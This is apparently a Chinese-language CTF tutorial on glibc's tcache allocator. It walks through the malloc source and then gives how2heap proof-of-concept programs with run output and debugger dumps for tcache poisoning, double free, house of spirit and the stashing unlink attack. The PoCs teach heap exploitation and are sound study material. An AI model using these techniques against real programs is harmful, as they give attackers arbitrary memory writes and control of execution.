Tcache attack

tcache makes heap exploitation easy again

前言

tcache 是 glibc 2.26 (ubuntu 17.10) 之后引入的一种技术(see commit),目的是提升堆管理的性能。但提升性能的同时舍弃了很多安全检查,也因此有了很多新的利用方式。正如前面说的,在2.26后面增加的tcache使得堆的利用更加方便简单了,下面的文章是整理与ctfwiki上的知识和其他大佬的博客的

tcache结构体

tcache引入了两个新的结构体,tcache_entrytcache_perthread_struct

这两个结构体和fastbin结构体很像,但是不太一样。

  • tcache_entry
1
2
3
4
5
6
/* We overlay this structure on the user-data portion of a chunk when
the chunk is stored in the per-thread cache. */
typedef struct tcache_entry
{
struct tcache_entry *next;
} tcache_entry;

tcache_entry 用于链接空闲的 chunk 结构体,其中的 next 指针指向下一个大小相同的 chunk。

需要注意的是这里的 next 指向 chunk 的 user data,而 fastbin 的 fd 指向 chunk 开头的地址。

而且,tcache_entry 会复用空闲 chunk 的 user data 部分。

  • tcache_perthread_struct
1
2
3
4
5
6
7
8
9
10
11
12
13
14
/* There is one of these for each thread, which contains the
per-thread cache (hence "tcache_perthread_struct"). Keeping
overall size low is mildly important. Note that COUNTS and ENTRIES
are redundant (we could have just counted the linked list each
time), this is for performance reasons. */
typedef struct tcache_perthread_struct
{
char counts[TCACHE_MAX_BINS];
tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

# define TCACHE_MAX_BINS 64

static __thread tcache_perthread_struct *tcache = NULL;

每个 thread 都会维护一个 tcache_perthread_struct,它是整个 tcache 的管理结构,一共有 TCACHE_MAX_BINS 个计数器和 TCACHE_MAX_BINS项 tcache_entry,其中

  • tcache_entry 用单向链表的方式链接了相同大小的处于空闲状态(free 后)的 chunk,这一点上和 fastbin 很像。
  • counts 记录了 tcache_entry 链上空闲 chunk 的数目,每条链上最多可以有 7 个 chunk。

基本工作方式

  • 第一次 malloc 时,会先 malloc 一块内存用来存放 tcache_perthread_struct
  • free 内存,且 size 小于 small bin size 时,tcache 之前会放到 fastbin 或者 unsorted bin 中
  • tcache 后:
    • 先放到对应的 tcache 中,直到 tcache 被填满(默认是 7 个)
    • tcache 被填满之后,再次 free 的内存和之前一样被放到 fastbin 或者 unsorted bin 中
    • tcache 中的 chunk 不会合并(不取消 inuse bit)
  • malloc 内存,且 size 在 tcache 范围内,先从 tcache 取 chunk,直到 tcache 为空
  • tcache 为空后,从 bin 中找
  • tcache 为空时,如果 fastbin/smallbin/unsorted bin 中有 size 符合的 chunk,会先把 fastbin/smallbin/unsorted bin 中的 chunk 放到 tcache 中,直到填满。之后再从 tcache 中取;因此 chunk 在 bin 中和 tcache 中的顺序会反过来

源代码分析

__libc_malloc

第一次 malloc 时,会进入到 MAYBE_INIT_TCACHE ()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
void *
__libc_malloc (size_t bytes)
{
......
......
#if USE_TCACHE
/* int_free also calls request2size, be careful to not pad twice. */
size_t tbytes;
// 根据 malloc 传入的参数计算 chunk 实际大小,并计算 tcache 对应的下标
checked_request2size (bytes, tbytes);
size_t tc_idx = csize2tidx (tbytes);

// 初始化 tcache
MAYBE_INIT_TCACHE ();
DIAG_PUSH_NEEDS_COMMENT;
if (tc_idx < mp_.tcache_bins // 根据 size 得到的 idx 在合法的范围内
/*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
&& tcache
&& tcache->entries[tc_idx] != NULL) // tcache->entries[tc_idx] 有 chunk
{
return tcache_get (tc_idx);
}
DIAG_POP_NEEDS_COMMENT;
#endif
......
......
}

__tcache_init()

其中 MAYBE_INIT_TCACHE () 在 tcache 为空(即第一次 malloc)时调用了 tcache_init(),直接查看 tcache_init()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
tcache_init(void)
{
mstate ar_ptr;
void *victim = 0;
const size_t bytes = sizeof (tcache_perthread_struct);
if (tcache_shutting_down)
return;
arena_get (ar_ptr, bytes); // 找到可用的 arena
victim = _int_malloc (ar_ptr, bytes); // 申请一个 sizeof(tcache_perthread_struct) 大小的 chunk
if (!victim && ar_ptr != NULL)
{
ar_ptr = arena_get_retry (ar_ptr, bytes);
victim = _int_malloc (ar_ptr, bytes);
}
if (ar_ptr != NULL)
__libc_lock_unlock (ar_ptr->mutex);
/* In a low memory situation, we may not be able to allocate memory
- in which case, we just keep trying later. However, we
typically do this very early, so either there is sufficient
memory, or there isn't enough memory to do non-trivial
allocations anyway. */
if (victim) // 初始化 tcache
{
tcache = (tcache_perthread_struct *) victim;
memset (tcache, 0, sizeof (tcache_perthread_struct));
}
}

tcache_init() 成功返回后,tcache_perthread_struct 就被成功建立了。

申请内存

接下来将进入申请内存的步骤

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
  // 从 tcache list 中获取内存
if (tc_idx < mp_.tcache_bins // 由 size 计算的 idx 在合法范围内
/*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
&& tcache
&& tcache->entries[tc_idx] != NULL) // 该条 tcache 链不为空
{
return tcache_get (tc_idx);
}
DIAG_POP_NEEDS_COMMENT;
#endif
// 进入与无 tcache 时类似的流程
if (SINGLE_THREAD_P)
{
victim = _int_malloc (&main_arena, bytes);
assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
&main_arena == arena_for_chunk (mem2chunk (victim)));
return victim;
}s

tcache->entries 不为空时,将进入 tcache_get() 的流程获取 chunk,否则与 tcache 机制前的流程类似,这里主要分析第一种 tcache_get()。这里也可以看出 tcache 的优先级很高,比 fastbin 还要高( fastbin 的申请在没进入 tcache 的流程中)。

tcache_get()

看一下 tcache_get()

1
2
3
4
5
6
7
8
9
10
11
12
/* Caller must ensure that we know tc_idx is valid and there's
available chunks to remove. */
static __always_inline void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
assert (tc_idx < TCACHE_MAX_BINS);
assert (tcache->entries[tc_idx] > 0);
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]); // 获得一个 chunk,counts 减一
return (void *) e;
}

tcache_get() 就是获得 chunk 的过程了。可以看出这个过程还是很简单的,从 tcache->entries[tc_idx] 中获得第一个 chunk,tcache->counts 减一,几乎没有任何保护。

__libc_free()

看完申请,再看看有 tcache 时的释放

1
2
3
4
5
6
7
8
9
void
__libc_free (void *mem)
{
......
......
MAYBE_INIT_TCACHE ();
ar_ptr = arena_for_chunk (p);
_int_free (ar_ptr, p, 0);
}

__libc_free() 没有太多变化,MAYBE_INIT_TCACHE () 在 tcache 不为空失去了作用。

_int_free()

跟进 _int_free()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
......
......
#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);
if (tcache
&& tc_idx < mp_.tcache_bins // 64
&& tcache->counts[tc_idx] < mp_.tcache_count) // 7
{
tcache_put (p, tc_idx);
return;
}
}
#endif
......
......

判断 tc_idx 合法,tcache->counts[tc_idx] 在 7 个以内时,就进入 tcache_put(),传递的两个参数是要释放的 chunk 和该 chunk 对应的 size 在 tcache 中的下标。

tcache_put()

1
2
3
4
5
6
7
8
9
10
11
/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}

tcache_puts() 完成了把释放的 chunk 插入到 tcache->entries[tc_idx] 链表头部的操作,也几乎没有任何保护。并且 没有把 p 位置零

Tcache Usage

  • 内存释放:

可以看到,在 free 函数的最先处理部分,首先是检查释放块是否页对齐及前后堆块的释放情况,便优先放入 tcache 结构中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
_int_free (mstate av, mchunkptr p, int have_lock)
{
INTERNAL_SIZE_T size; /* its size */
mfastbinptr *fb; /* associated fastbin */
mchunkptr nextchunk; /* next contiguous chunk */
INTERNAL_SIZE_T nextsize; /* its size */
int nextinuse; /* true if nextchunk is used */
INTERNAL_SIZE_T prevsize; /* size of previous contiguous chunk */
mchunkptr bck; /* misc temp for linking */
mchunkptr fwd; /* misc temp for linking */

size = chunksize (p);

/* Little security check which won't hurt performance: the
allocator never wrapps around at the end of the address space.
Therefore we can exclude some size values which might appear
here by accident or by "design" from some intruder. */
if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
|| __builtin_expect (misaligned_chunk (p), 0))
malloc_printerr ("free(): invalid pointer");
/* We know that each chunk is at least MINSIZE bytes in size or a
multiple of MALLOC_ALIGNMENT. */
if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
malloc_printerr ("free(): invalid size");

check_inuse_chunk(av, p);

#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);

if (tcache
&& tc_idx < mp_.tcache_bins
&& tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (p, tc_idx);
return;
}
}
#endif

......
}
  • 内存申请:

在内存分配的 malloc 函数中有多处,会将内存块移入 tcache 中。

(1)首先,申请的内存块符合 fastbin 大小时并且在 fastbin 内找到可用的空闲块时,会把该 fastbin 链上的其他内存块放入 tcache 中。

(2)其次,申请的内存块符合 smallbin 大小时并且在 smallbin 内找到可用的空闲块时,会把该 smallbin 链上的其他内存块放入 tcache 中。

(3)当在 unsorted bin 链上循环处理时,当找到大小合适的链时,并不直接返回,而是先放到 tcache 中,继续处理。

代码太长就不全贴了,贴个符合 fastbin 的时候

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
{
idx = fastbin_index (nb);
mfastbinptr *fb = &fastbin (av, idx);
mchunkptr pp;
victim = *fb;

if (victim != NULL)
{
if (SINGLE_THREAD_P)
*fb = victim->fd;
else
REMOVE_FB (fb, pp, victim);
if (__glibc_likely (victim != NULL))
{
size_t victim_idx = fastbin_index (chunksize (victim));
if (__builtin_expect (victim_idx != idx, 0))
malloc_printerr ("malloc(): memory corruption (fast)");
check_remalloced_chunk (av, victim, nb);
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;

/* While bin not empty and tcache not full, copy chunks. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = *fb) != NULL)
{
if (SINGLE_THREAD_P)
*fb = tc_victim->fd;
else
{
REMOVE_FB (fb, pp, tc_victim);
if (__glibc_unlikely (tc_victim == NULL))
break;
}
tcache_put (tc_victim, tc_idx);
}
}
#endif
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
}
}
  • tcache 取出:在内存申请的开始部分,首先会判断申请大小块,在 tcache 是否存在,如果存在就直接从 tcache 中摘取,否则再使用_int_malloc 分配。
  • 在循环处理 unsorted bin 内存块时,如果达到放入 unsorted bin 块最大数量,会立即返回。默认是 0,即不存在上限。
1
2
3
4
5
6
7
8
9
10
11
#if USE_TCACHE
/* If we've processed as many chunks as we're allowed while
filling the cache, return one of the cached ones. */
++tcache_unsorted_count;
if (return_cached
&& mp_.tcache_unsorted_limit > 0
&& tcache_unsorted_count > mp_.tcache_unsorted_limit)
{
return tcache_get (tc_idx);
}
#endif
  • 在循环处理 unsorted bin 内存块后,如果之前曾放入过 tcache 块,则会取出一个并返回。
1
2
3
4
5
6
7
#if USE_TCACHE
/* If all the small chunks we found ended up cached, return one now. */
if (return_cached)
{
return tcache_get (tc_idx);
}
#endif

Pwn Tcache

tcache poisoning

通过覆盖 tcache 中的 next,不需要伪造任何 chunk 结构即可实现 malloc 到任何地址。

以 how2heap 中的 tcache_poisoning 为例

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <assert.h>

int main()
{
// disable buffering
setbuf(stdin, NULL);
setbuf(stdout, NULL);

printf("This file demonstrates a simple tcache poisoning attack by tricking malloc into\n"
"returning a pointer to an arbitrary location (in this case, the stack).\n"
"The attack is very similar to fastbin corruption attack.\n");
printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f,\n"
"We have to create and free one more chunk for padding before fd pointer hijacking.\n\n");

size_t stack_var;
printf("The address we want malloc() to return is %p.\n", (char *)&stack_var);

printf("Allocating 2 buffers.\n");
intptr_t *a = malloc(128);
printf("malloc(128): %p\n", a);
intptr_t *b = malloc(128);
printf("malloc(128): %p\n", b);

printf("Freeing the buffers...\n");
free(a);
free(b);

printf("Now the tcache list has [ %p -> %p ].\n", b, a);
printf("We overwrite the first %lu bytes (fd/next pointer) of the data at %p\n"
"to point to the location to control (%p).\n", sizeof(intptr_t), b, &stack_var);
b[0] = (intptr_t)&stack_var;
printf("Now the tcache list has [ %p -> %p ].\n", b, &stack_var);

printf("1st malloc(128): %p\n", malloc(128));
printf("Now the tcache list has [ %p ].\n", &stack_var);

intptr_t *c = malloc(128);
printf("2nd malloc(128): %p\n", c);
printf("We got the control\n");

assert((long)&stack_var == (long)c);
return 0;
}

运行结果是

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@74f21669baa4:/ctf/work/how2heap/glibc_2.27 # ./tcache_poisoning                   
This file demonstrates a simple tcache poisoning attack by tricking malloc into
returning a pointer to an arbitrary location (in this case, the stack).
The attack is very similar to fastbin corruption attack.
After the patch https://sourceware.org/git/?p=glibc.git;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f,
We have to create and free one more chunk for padding before fd pointer hijacking.
The address we want malloc() to return is 0x7ffddb503088.
Allocating 2 buffers.
malloc(128): 0x56460ae042a0
malloc(128): 0x56460ae04330
Freeing the buffers...
Now the tcache list has [ 0x56460ae04330 -> 0x56460ae042a0 ].
We overwrite the first 8 bytes (fd/next pointer) of the data at 0x56460ae04330
to point to the location to control (0x7ffddb503088).
Now the tcache list has [ 0x56460ae04330 -> 0x7ffddb503088 ].
1st malloc(128): 0x56460ae04330
Now the tcache list has [ 0x7ffddb503088 ].
2nd malloc(128): 0x7ffddb503088
We got the control

tcache dup

类似 fastbin dup,不过利用的是 tcache_put() 的不严谨,再看一遍tcache_put的源代码

1
2
3
4
5
6
7
8
9
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}

可以看出,tcache_put() 的检查也可以忽略不计(甚至没有对 tcache->counts[tc_idx] 的检查,),大幅提高性能的同时安全性也下降了很多。

因为没有任何检查,所以我们可以对同一个 chunk 多次 free,造成 cycliced list。

以 how2heap 的 tcache_dup 为例分析,源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <stdio.h>                                                                     
#include <stdlib.h>
#include <assert.h>
int main()
{
printf("This file demonstrates a simple double-free attack with tcache.\n");
printf("Allocating buffer.\n");
int *a = malloc(8);
printf("malloc(8): %p\n", a);
printf("Freeing twice...\n");
free(a);
free(a);
printf("Now the free list has [ %p, %p ].\n", a, a);
void *b = malloc(8);
void *c = malloc(8);
printf("Next allocated buffers will be same: [ %p, %p ].\n", b, c);
assert((long)b == (long)c);
return 0;
}

因为tcache_put的检测没完善,所以可以很简单的就能double free,但是在最新后面版本的libc中添加了tcache的double free的check

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
index 6d7a6a8..f730d7a 100644 (file)
--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -2967,6 +2967,8 @@ mremap_chunk (mchunkptr p, size_t new_size)
typedef struct tcache_entry
{
struct tcache_entry *next;
+ /* This field exists to detect double frees. */
+ struct tcache_perthread_struct *key;
} tcache_entry;

/* There is one of these for each thread, which contains the
@@ -2990,6 +2992,11 @@ tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
+
+ /* Mark this chunk as "in the tcache" so the test in _int_free will
+ detect a double free. */
+ e->key = tcache;
+
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
@@ -3005,6 +3012,7 @@ tcache_get (size_t tc_idx)
assert (tcache->entries[tc_idx] > 0);
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]);
+ e->key = NULL;
return (void *) e;
}

@@ -4218,6 +4226,26 @@ _int_free (mstate av, mchunkptr p, int have_lock)
{
size_t tc_idx = csize2tidx (size);

+ /* Check to see if it's already in the tcache. */
+ tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+ /* This test succeeds on double free. However, we don't 100%
+ trust it (it also matches random payload data at a 1 in
+ 2^<size_t> chance), so verify it's not an unlikely coincidence
+ before aborting. */
+ if (__glibc_unlikely (e->key == tcache && tcache))
+ {
+ tcache_entry *tmp;
+ LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+ for (tmp = tcache->entries[tc_idx];
+ tmp;
+ tmp = tmp->next)
+ if (tmp == e)
+ malloc_printerr ("free(): double free detected in tcache 2");
+ /* If we get here, it was a coincidence. We've wasted a few
+ cycles, but don't abort. */
+ }
+
if (tcache
&& tc_idx < mp_.tcache_bins
&& tcache->counts[tc_idx] < mp_.tcache_count)

目前为止,只看到了在 free 操作的时候的 check ,似乎没有对 get 进行新的 check。

tcache perthread corruption

我们已经知道 tcache_perthread_struct 是整个 tcache 的管理结构,如果能控制这个结构体,那么无论我们 malloc 的 size 是多少,地址都是可控的。

这里没找到太好的例子,自己想了一种情况

设想有如下的堆排布情况

1
2
3
4
5
6
7
8
9
10
11
12
tcache_    +------------+
\perthread |...... |
\_struct +------------+
|counts[i] |
+------------+
|...... | +----------+
+------------+ |header |
|entries[i] |--------->+----------+
+------------+ |NULL |
|...... | +----------+
| | | |
+------------+ +----------+

通过一些手段(如 tcache posioning),我们将其改为了

1
2
3
4
5
6
7
8
9
10
11
12
tcache_    +------------+<---------------------------+
\perthread |...... | |
\_struct +------------+ |
|counts[i] | |
+------------+ |
|...... | +----------+ |
+------------+ |header | |
|entries[i] |--------->+----------+ |
+------------+ |target |------+
|...... | +----------+
| | | |
+------------+ +----------+

这样,两次 malloc 后我们就返回了 tcache_perthread_struct 的地址,就可以控制整个 tcache 了。

因为 tcache_perthread_struct 也在堆上,因此这种方法一般只需要 partial overwrite 就可以达到目的。

tcache house of spirit

拿 how2heap 的源码来讲:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#include <stdio.h>
#include <stdlib.h>

int main()
{
fprintf(stderr, "This file demonstrates the house of spirit attack on tcache.\n");
fprintf(stderr, "It works in a similar way to original house of spirit but you don't need to create fake chunk after the fake chunk that will be freed.\n");
fprintf(stderr, "You can see this in malloc.c in function _int_free that tcache_put is called without checking if next chunk's size and prev_inuse are sane.\n");
fprintf(stderr, "(Search for strings \"invalid next size\" and \"double free or corruption\")\n\n");

fprintf(stderr, "Ok. Let's start with the example!.\n\n");


fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
malloc(1);

fprintf(stderr, "Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n");
unsigned long long *a; //pointer that will be overwritten
unsigned long long fake_chunks[10]; //fake chunk region

fprintf(stderr, "This region contains one fake chunk. It's size field is placed at %p\n", &fake_chunks[1]);

fprintf(stderr, "This chunk size has to be falling into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
fake_chunks[1] = 0x40; // this is the size


fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");

a = &fake_chunks[2];

fprintf(stderr, "Freeing the overwritten pointer.\n");
free(a);

fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
}

攻击之后的目的是,去控制栈上的内容,malloc 一块 chunk ,然后我们通过在栈上 fake 的 chunk,然后去 free 掉他,我们会发现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
gdb-peda$ heapinfo
(0x20) fastbin[0]: 0x0
(0x30) fastbin[1]: 0x0
(0x40) fastbin[2]: 0x0
(0x50) fastbin[3]: 0x0
(0x60) fastbin[4]: 0x0
(0x70) fastbin[5]: 0x0
(0x80) fastbin[6]: 0x0
(0x90) fastbin[7]: 0x0
(0xa0) fastbin[8]: 0x0
(0xb0) fastbin[9]: 0x0
top: 0x4052e0 (size : 0x20d20)
last_remainder: 0x0 (size : 0x0)
unsortbin: 0x0
(0x90) tcache_entry[7]: 0x7fffffffe510 --> 0x401340

Tcache 里就存放了一块 栈上的内容,我们之后只需 malloc,就可以控制这块内存。

在 smallbin 中包含有空闲块的时候,会同时将同大小的其他空闲块,放入 tcache 中,此时也会出现解链操作,但相比于 unlink 宏,缺少了链完整性校验。因此,原本 unlink 操作在该条件下也可以使用。

这种攻击利用的是 tcache bin 有剩余 (数量小于 TCACHE_MAX_BINS ) 时,同大小的 small bin 会放进 tcache 中 (这种情况可以用 calloc 分配同大小堆块触发,因为 calloc 分配堆块时不从 tcache bin 中选取)。在获取到一个 smallbin 中的一个 chunk 后会如果 tcache 仍有足够空闲位置,会将剩余的 small bin 链入 tcache ,在这个过程中只对第一个 bin 进行了完整性检查,后面的堆块的检查缺失。当攻击者可以写一个 small bin 的 bk 指针时,其可以在任意地址上写一个 libc 地址 (类似 unsorted bin attack 的效果)。构造得当的情况下也可以分配 fake chunk 到任意地址。

这里以 how2heap 中的 tcache_stashing_unlink_attack.c 为例。

我们按照释放的先后顺序称 smallbin[sz] 中的两个 chunk 分别为 chunk0 和 chunk1。我们修改 chunk1 的 bkfake_chunk_addr。同时还要在 fake_chunk_addr->bk 处提前写一个可写地址 writable_addr 。调用 calloc(size-0x10) 的时候会返回给用户 chunk0 (这是因为 smallbin 的 FIFO 分配机制),假设 tcache[sz] 中有 5 个空闲堆块,则有足够的位置容纳 chunk1 以及 fake_chunk 。在源码的检查中,只对第一个 chunk 的链表完整性做了检测 __glibc_unlikely (bck->fd != victim) ,后续堆块在放入过程中并没有检测。

因为 tcache 的分配机制是 LIFO ,所以位于 fake_chunk->bk 指针处的 fake_chunk 在链入 tcache 的时候反而会放到链表表头。在下一次调用 malloc(sz-0x10) 时会返回 fake_chunk+0x10 给用户,同时,由于 bin->bk = bck;bck->fd = bin; 的 unlink 操作,会使得 writable_addr+0x10 处被写入一个 libc 地址。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#include <stdio.h>
#include <stdlib.h>

int main(){
unsigned long stack_var[0x10] = {0};
unsigned long *chunk_lis[0x10] = {0};
unsigned long *target;

fprintf(stderr, "This file demonstrates the stashing unlink attack on tcache.\n\n");
fprintf(stderr, "This poc has been tested on both glibc 2.27 and glibc 2.29.\n\n");
fprintf(stderr, "This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\n\n");
fprintf(stderr, "The mechanism of putting smallbin into tcache in glibc gives us a chance to launch the attack.\n\n");
fprintf(stderr, "This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we'll create the chunk on the stack.\n\n");

// stack_var emulate the fake_chunk we want to alloc to
fprintf(stderr, "Stack_var emulates the fake chunk we want to alloc to.\n\n");
fprintf(stderr, "First let's write a writeable address to fake_chunk->bk to bypass bck->fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk->bk + 0x10) which is stack_var[4] will be a libc addr after attack.\n\n");

stack_var[3] = (unsigned long)(&stack_var[2]);

fprintf(stderr, "You can see the value of fake_chunk->bk is:%p\n\n",(void*)stack_var[3]);
fprintf(stderr, "Also, let's see the initial value of stack_var[4]:%p\n\n",(void*)stack_var[4]);
fprintf(stderr, "Now we alloc 9 chunks with malloc.\n\n");

//now we malloc 9 chunks
for(int i = 0;i < 9;i++){
chunk_lis[i] = (unsigned long*)malloc(0x90);
}

//put 7 tcache
fprintf(stderr, "Then we free 7 of them in order to put them into tcache. Carefully we didn't free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\n\n");

for(int i = 3;i < 9;i++){
free(chunk_lis[i]);
}

fprintf(stderr, "As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\n\n");

//last tcache bin
free(chunk_lis[1]);
//now they are put into unsorted bin
free(chunk_lis[0]);
free(chunk_lis[2]);

//convert into small bin
fprintf(stderr, "Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\n\n");

malloc(0xa0);//>0x90

//now 5 tcache bins
fprintf(stderr, "Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\n\n");

malloc(0x90);
malloc(0x90);

fprintf(stderr, "Now we emulate a vulnerability that can overwrite the victim->bk pointer into fake_chunk addr: %p.\n\n",(void*)stack_var);

//change victim->bck
/*VULNERABILITY*/
chunk_lis[2][1] = (unsigned long)stack_var;
/*VULNERABILITY*/

//trigger the attack
fprintf(stderr, "Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\n\n");

calloc(1,0x90);

fprintf(stderr, "Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck->fd has been changed into a libc addr: %p\n\n",(void*)stack_var[2],(void*)stack_var[4]);

//malloc and return our fake chunk on stack
target = malloc(0x90);

fprintf(stderr, "As you can see, next malloc(0x90) will return the region our fake chunk: %p\n",(void*)target);
return 0;
}

这个 poc 用栈上的一个数组上模拟 fake_chunk 。首先构造出 5 个 tcache chunk 和 2 个 smallbin chunk 的情况。模拟 UAF 漏洞修改 bin2->bkfake_chunk ,在 calloc(0x90) 的时候触发攻击。

我们在 calloc 处下断点,调用前查看堆块排布情况。此时 tcache[0xa0] 中有 5 个空闲块。可以看到 chunk1->bk 已经被改为了 fake_chunk_addr 。而 fake_chunk->bk 也写上了一个可写地址。由于 smallbin 是按照 bk 指针寻块的,分配得到的顺序应当是 0x0000000000603250->0x0000000000603390->0x00007fffffffdbc0 (FIFO) 。调用 calloc 会返回给用户 0x0000000000603250+0x10

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
pwndbg> heapinfo
(0x20) fastbin[0]: 0x0
(0x30) fastbin[1]: 0x0
(0x40) fastbin[2]: 0x0
(0x50) fastbin[3]: 0x0
(0x60) fastbin[4]: 0x0
(0x70) fastbin[5]: 0x0
(0x80) fastbin[6]: 0x0
(0x90) fastbin[7]: 0x0
(0xa0) fastbin[8]: 0x0
(0xb0) fastbin[9]: 0x0
top: 0x5555555598e0 (size : 0x20720)
last_remainder: 0x0 (size : 0x0)
unsortbin: 0x0
(0x0a0) smallbin[ 8]: 0x5555555593d0 (doubly linked list corruption 0x5555555593d0 != 0x0 and 0x5555555593d0 is broken)
(0xa0) tcache_entry[8](5): 0x555555559700 --> 0x555555559660 --> 0x5555555595c0 --> 0x555555559520 --> 0x555555559480

pwndbg> bins
tcachebins
0xa0 [ 5]: 0x555555559700 —▸ 0x555555559660 —▸ 0x5555555595c0 —▸ 0x555555559520 —▸ 0x555555559480 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0xa0 [corrupted]
FD: 0x5555555593d0 —▸ 0x555555559290 —▸ 0x7ffff7fb0c70 (main_arena+240) ◂— 0x5555555593d0
BK: 0x555555559290 —▸ 0x5555555593d0 —▸ 0x7fffffffe400 —▸ 0x7fffffffe410 ◂— 0x0
largebins
empty

调用 calloc 后再查看堆块排布情况,可以看到 fake_chunk 已经被链入 tcache_entry[8] , 且因为分配顺序变成了 LIFO , 0x7fffffffdbd0-0x10 这个块被提到了链表头,下次 malloc(0x90) 即可获得这个块。

